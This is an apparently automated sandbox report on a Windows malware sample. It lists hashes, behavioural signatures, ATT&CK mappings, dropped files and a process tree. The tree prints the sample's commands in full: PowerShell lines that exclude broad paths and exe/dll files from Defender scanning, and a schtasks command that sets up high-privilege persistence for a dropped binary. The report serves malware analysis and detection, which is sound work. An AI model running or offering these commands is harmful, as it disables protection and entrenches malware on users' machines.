Analysis

  • max time kernel
    126s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    14-10-2021 05:08

General

  • Target

    fa409741e16094bb8bc373d7b46742cd.exe

  • Size

    1.9MB

  • MD5

    fa409741e16094bb8bc373d7b46742cd

  • SHA1

    e082dd13c52fe7fb65fac801d2588e0c9153d9cc

  • SHA256

    c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8

  • SHA512

    7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 6 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fa409741e16094bb8bc373d7b46742cd.exe
    "C:\Users\Admin\AppData\Local\Temp\fa409741e16094bb8bc373d7b46742cd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1316
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\fa409741e16094bb8bc373d7b46742cd.exe"
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1408
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1452
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1228
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1508
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "shrome" /tr "C:\Windows\system32\shrome.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1144
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "shrome" /tr "C:\Windows\system32\shrome.exe"
          4⤵
          • Creates scheduled task(s)
          PID:1816
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Windows\system32\shrome.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1748
        • C:\Windows\system32\shrome.exe
          C:\Windows\system32\shrome.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1772
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\\conhost.exe" "C:\Windows\system32\shrome.exe"
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:548
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1752
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                7⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:112
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                7⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1132
            • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
              "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
              6⤵
              • Executes dropped EXE
              PID:1276
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\\conhost.exe" "/sihost32"
                7⤵
                  PID:836

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      9839a153dd23f855e14ced0d44035208

      SHA1

      276add3c053dd890b6386e64e13df8bb2cb9a853

      SHA256

      ff48a647e20916e7d2026caefcb6280a83209af6cfb9da271d24ec17d5f12e94

      SHA512

      416ac27c93af1abc146c2f848477fa38f079cf6252d232aa1d9f7fb42ddbf6bc65016b4dcdf13f939def7c686ac303e1d8e7434916d3e0de7c12140b1fccf941

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      a07cf59ef745ea27ea563d21fd2881d7

      SHA1

      f46837adee2b5c702bb0196e7cabb87ca203b5d2

      SHA256

      2134fdde87cefc1c5f4f6b2e2ba906584ba6bf247ddb0884a845b11c7a996fd1

      SHA512

      122c64c7790f1f23331af4a790c01720b516b534565e0e7a4cc0f6b4f52ec903d1a2b16d6ad353455308c6296988ce257f29386b75745a9ecbd8f9b0e6b7f247

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      a07cf59ef745ea27ea563d21fd2881d7

      SHA1

      f46837adee2b5c702bb0196e7cabb87ca203b5d2

      SHA256

      2134fdde87cefc1c5f4f6b2e2ba906584ba6bf247ddb0884a845b11c7a996fd1

      SHA512

      122c64c7790f1f23331af4a790c01720b516b534565e0e7a4cc0f6b4f52ec903d1a2b16d6ad353455308c6296988ce257f29386b75745a9ecbd8f9b0e6b7f247

    • C:\Windows\System32\Microsoft\Telemetry\sihost32.exe
      MD5

      cceaed462cd04bcc64c90e5d0f11df59

      SHA1

      7a1b253f70f7b30decac1098245431459d8e96b5

      SHA256

      a86a112c0ae1c068097d28318510c31344f6624c86004bd822f43772d3e5f682

      SHA512

      3df0923bb0a15c714c19b8e7252bf6b16800accea2c084b002535c85826a8163e6766a8a50751a49d417930d387459aca8425a845a5c3af298515579473b45b9

    • C:\Windows\System32\shrome.exe
      MD5

      fa409741e16094bb8bc373d7b46742cd

      SHA1

      e082dd13c52fe7fb65fac801d2588e0c9153d9cc

      SHA256

      c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8

      SHA512

      7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f

    • C:\Windows\system32\shrome.exe
      MD5

      fa409741e16094bb8bc373d7b46742cd

      SHA1

      e082dd13c52fe7fb65fac801d2588e0c9153d9cc

      SHA256

      c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8

      SHA512

      7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f

    • \??\PIPE\srvsvc
      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • \Windows\System32\Microsoft\Telemetry\sihost32.exe
      MD5

      cceaed462cd04bcc64c90e5d0f11df59

      SHA1

      7a1b253f70f7b30decac1098245431459d8e96b5

      SHA256

      a86a112c0ae1c068097d28318510c31344f6624c86004bd822f43772d3e5f682

      SHA512

      3df0923bb0a15c714c19b8e7252bf6b16800accea2c084b002535c85826a8163e6766a8a50751a49d417930d387459aca8425a845a5c3af298515579473b45b9

    • \Windows\System32\Microsoft\Telemetry\sihost32.exe
      MD5

      cceaed462cd04bcc64c90e5d0f11df59

      SHA1

      7a1b253f70f7b30decac1098245431459d8e96b5

      SHA256

      a86a112c0ae1c068097d28318510c31344f6624c86004bd822f43772d3e5f682

      SHA512

      3df0923bb0a15c714c19b8e7252bf6b16800accea2c084b002535c85826a8163e6766a8a50751a49d417930d387459aca8425a845a5c3af298515579473b45b9

    • \Windows\System32\shrome.exe
      MD5

      fa409741e16094bb8bc373d7b46742cd

      SHA1

      e082dd13c52fe7fb65fac801d2588e0c9153d9cc

      SHA256

      c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8

      SHA512

      7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f

    • \Windows\System32\shrome.exe
      MD5

      fa409741e16094bb8bc373d7b46742cd

      SHA1

      e082dd13c52fe7fb65fac801d2588e0c9153d9cc

      SHA256

      c5c1c355c0e253df7b6a49d296c00663cc9692328dd236ab4f43fafc2ec70ec8

      SHA512

      7cedd8048df9b44587f55c9ccc5afcd8f0ada0fa119c9848a3c19f364fcdd947b8e54dab9ffce0f425484bb76f7d7e5db18a7516ddb5cde9a4f053e6c105046f

    • memory/112-102-0x0000000002342000-0x0000000002344000-memory.dmp
      Filesize

      8KB

    • memory/112-96-0x000007FEEC750000-0x000007FEED2AD000-memory.dmp
      Filesize

      11.4MB

    • memory/112-88-0x0000000000000000-mapping.dmp
    • memory/112-101-0x0000000002340000-0x0000000002342000-memory.dmp
      Filesize

      8KB

    • memory/112-108-0x000000000234B000-0x000000000236A000-memory.dmp
      Filesize

      124KB

    • memory/112-103-0x0000000002344000-0x0000000002347000-memory.dmp
      Filesize

      12KB

    • memory/548-97-0x000000001B192000-0x000000001B194000-memory.dmp
      Filesize

      8KB

    • memory/548-100-0x000000001B197000-0x000000001B198000-memory.dmp
      Filesize

      4KB

    • memory/548-99-0x000000001B196000-0x000000001B197000-memory.dmp
      Filesize

      4KB

    • memory/548-98-0x000000001B194000-0x000000001B196000-memory.dmp
      Filesize

      8KB

    • memory/836-116-0x000000001AD72000-0x000000001AD74000-memory.dmp
      Filesize

      8KB

    • memory/836-114-0x0000000000310000-0x0000000000313000-memory.dmp
      Filesize

      12KB

    • memory/836-117-0x000000001AD74000-0x000000001AD76000-memory.dmp
      Filesize

      8KB

    • memory/836-118-0x000000001AD76000-0x000000001AD77000-memory.dmp
      Filesize

      4KB

    • memory/836-119-0x000000001AD77000-0x000000001AD78000-memory.dmp
      Filesize

      4KB

    • memory/1132-111-0x00000000029D2000-0x00000000029D4000-memory.dmp
      Filesize

      8KB

    • memory/1132-109-0x000000001B7A0000-0x000000001BA9F000-memory.dmp
      Filesize

      3.0MB

    • memory/1132-113-0x00000000029DB000-0x00000000029FA000-memory.dmp
      Filesize

      124KB

    • memory/1132-110-0x00000000029D0000-0x00000000029D2000-memory.dmp
      Filesize

      8KB

    • memory/1132-112-0x00000000029D4000-0x00000000029D7000-memory.dmp
      Filesize

      12KB

    • memory/1132-104-0x0000000000000000-mapping.dmp
    • memory/1132-107-0x000007FEF1E40000-0x000007FEF299D000-memory.dmp
      Filesize

      11.4MB

    • memory/1144-63-0x0000000000000000-mapping.dmp
    • memory/1228-67-0x0000000002740000-0x0000000002742000-memory.dmp
      Filesize

      8KB

    • memory/1228-61-0x0000000000000000-mapping.dmp
    • memory/1228-62-0x000007FEFB891000-0x000007FEFB893000-memory.dmp
      Filesize

      8KB

    • memory/1228-68-0x0000000002742000-0x0000000002744000-memory.dmp
      Filesize

      8KB

    • memory/1228-70-0x000000000274B000-0x000000000276A000-memory.dmp
      Filesize

      124KB

    • memory/1228-64-0x000007FEEEE40000-0x000007FEEF7DD000-memory.dmp
      Filesize

      9.6MB

    • memory/1228-69-0x0000000002744000-0x0000000002747000-memory.dmp
      Filesize

      12KB

    • memory/1276-92-0x0000000000000000-mapping.dmp
    • memory/1408-59-0x000000001B1E6000-0x000000001B1E7000-memory.dmp
      Filesize

      4KB

    • memory/1408-54-0x00000000000B0000-0x00000000002A1000-memory.dmp
      Filesize

      1.9MB

    • memory/1408-56-0x000000001B450000-0x000000001B63D000-memory.dmp
      Filesize

      1.9MB

    • memory/1408-58-0x000000001B1E4000-0x000000001B1E6000-memory.dmp
      Filesize

      8KB

    • memory/1408-55-0x000000001B1E2000-0x000000001B1E4000-memory.dmp
      Filesize

      8KB

    • memory/1408-66-0x000000001B1E7000-0x000000001B1E8000-memory.dmp
      Filesize

      4KB

    • memory/1452-60-0x0000000000000000-mapping.dmp
    • memory/1508-75-0x0000000002640000-0x0000000002642000-memory.dmp
      Filesize

      8KB

    • memory/1508-78-0x000000000264B000-0x000000000266A000-memory.dmp
      Filesize

      124KB

    • memory/1508-77-0x0000000002644000-0x0000000002647000-memory.dmp
      Filesize

      12KB

    • memory/1508-76-0x0000000002642000-0x0000000002644000-memory.dmp
      Filesize

      8KB

    • memory/1508-74-0x000007FEED0F0000-0x000007FEEDC4D000-memory.dmp
      Filesize

      11.4MB

    • memory/1508-71-0x0000000000000000-mapping.dmp
    • memory/1748-79-0x0000000000000000-mapping.dmp
    • memory/1752-87-0x0000000000000000-mapping.dmp
    • memory/1772-83-0x0000000000000000-mapping.dmp
    • memory/1816-65-0x0000000000000000-mapping.dmp